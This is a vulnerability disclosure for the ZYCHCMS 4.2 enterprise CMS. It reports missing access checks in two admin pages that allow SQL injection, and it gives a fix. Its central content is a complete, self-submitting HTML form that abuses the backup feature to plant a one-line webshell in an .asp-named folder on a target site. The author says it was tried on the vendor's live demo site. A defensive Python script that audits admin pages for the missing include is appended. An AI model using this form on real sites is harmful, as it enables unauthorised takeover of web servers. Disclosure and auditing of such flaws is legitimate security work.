① SQL Injection Vulnerability
② Backend Webshell
Detailed description:
Affected versions: ZYCHCMS Enterprise Website Management System 4.2 (the issue in the following two files should apply across versions)
① SQL Injection Vulnerability
Vulnerable files: /admin/add_js.asp and /admin/add_xm_jiang.asp
Vulnerability cause: missing access filter
Vulnerability code:
Both files have the same flaw. The filter file /admin/seeion.asp is not included at the beginning of the file, so the current user's permissions are never checked and the page operates on the database directly.
② Backend Webshell
The admin backend has a database backup function. By submitting the backup form from a local page, you can get around the restriction, create a folder with an .asp suffix, and back up a one-line webshell into it.
I found a form on the Internet and modified it for my use. See result 2.
The following code is submitted locally:
<form method="post" action="http://www.2cto.com/admin/Manage_backup.asp?Action=Backup" name=add>
<!-- Eg: http://127.0.0.1:99/admin/Manage_backup.asp?Action=Backup -->
<tr>
<td height="30" background="images/bg_list.gif"><div style="padding-left:10px; font-weight:bold; color:#FFFFFF; text-align:left">Back up the database</div></td>
</tr>
<tr>
<td bgcolor="#FFFFFF"><span class="back_southidc">
</span>
<table width="100%" border="0" align="center" cellpadding="5" cellspacing="0">
<tr onmouseover="style.backgroundColor='#EEEEEE'" onmouseout="style.backgroundColor='#f1f5f8'" bgcolor="#F1F5F8">
<td height="25" width="30%" class="td"><div align="left">Current database path</div></td>
<td width="70%" class="td">
<div align="left">
<input type="text" size="30" name="DBpath" value="path of the one-line webshell uploaded to the site in image format"/>
<!-- Eg: ../uploadfile/image/Logo/20120803130885328532_ZYCH.jpg -->
<input type="hidden" size="50" name="bkfolder" value="123.asp"/>
</div></td>
</tr>
<tr onmouseover="style.backgroundColor='#EEEEEE'" onmouseout="style.backgroundColor='#ffff'" bgcolor="#FFFFFF">
<td height="25" width="30%" class="td"><div align="left">Backup database name</div></td>
<td class="td"><div align="left">
<input type="text" size="30" name="bkDBname" value="4.mdb"/>
[If the backup directory contains this file, it will be overwritten. If not, it will be automatically created]</div></td>
</tr>
<tr onmouseover="style.backgroundColor='#EEEEEE'" onmouseout="style.backgroundColor='#f1f5f8'" bgcolor="#F1F5F8">
<td height="25" width="30%" class="td"><div align="left"></div></td>
<td class="td"><div align="left">
<input type="submit" value="Confirm backup" class="btn"/>
</div></td>
</tr>
</table></td></tr></form>
</table>
</td>
</tr>
</table>
<script>
document.all.add.submit();
</script>
Proof of vulnerability: I used the official demonstration site for testing, 1
Backing up the one-line webshell
Solution: Add the following include at the beginning of each affected file:
<!--#include file="seeion.asp"-->
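One way to check an installation for the root cause described above (an admin page that never includes seeion.asp, or includes it only after script code has already run). This is an added example, not code from the original advisory or from ZYCHCMS; the function names, the "late" heuristic and the sample file contents are assumptions.

```python
import re
import tempfile
from pathlib import Path

# <!--#include file="seeion.asp"--> in any case/spacing, file= or virtual=, optional path.
INCLUDE_RE = r'<!--\s*#\s*include\s+(?:file|virtual)\s*=\s*"(?:[^"]*[\\/])?{name}"\s*-->'
# First server-side script block that is not an <%@ ... %> page directive.
CODE_RE = re.compile(r'<%(?!@)')


def audit_admin_dir(admin_dir, guard="seeion.asp"):
    """Return {filename: 'missing' | 'late'} for .asp pages lacking the guard include."""
    include_re = re.compile(INCLUDE_RE.format(name=re.escape(guard)), re.I)
    findings = {}
    for path in sorted(Path(admin_dir).iterdir()):
        if not path.is_file() or path.suffix.lower() != ".asp":
            continue  # also skips folders that merely carry an .asp suffix
        if path.name.lower() == guard.lower():
            continue  # the guard file does not include itself
        # latin-1 never fails to decode; only ASCII markup is matched.
        text = path.read_text(encoding="latin-1")
        inc = include_re.search(text)
        code = CODE_RE.search(text)
        if inc is None:
            findings[path.name] = "missing"
        elif code is not None and code.start() < inc.start():
            findings[path.name] = "late"  # script code runs before the check
    return findings


def demo():
    # Constructed sample pages: add_js.asp and add_xm_jiang.asp are the names
    # from the advisory, the *_example.asp names and all contents are made up.
    samples = {
        "seeion.asp": '<% If Session("admin") = "" Then Response.End %>',
        "add_js.asp": '<!--#include file="conn.asp"-->\n<% conn.Execute(sql) %>',
        "add_xm_jiang.asp": '<% conn.Execute(sql) %>',
        "late_example.asp": '<% conn.Execute(sql) %>\n<!-- #Include File = "seeion.asp" -->',
        "guarded_example.asp": '<%@ Language=VBScript %>\n<!--#include file="seeion.asp"-->\n<% Run() %>',
    }
    with tempfile.TemporaryDirectory() as d:
        for name, body in samples.items():
            Path(d, name).write_text(body, encoding="latin-1")
        return audit_admin_dir(d)


if __name__ == "__main__":
    for name, status in demo().items():
        print(f"{name}: guard include {status}")
```

Run `audit_admin_dir` against a copy of the site's /admin directory; any file it reports needs the include added as its first line.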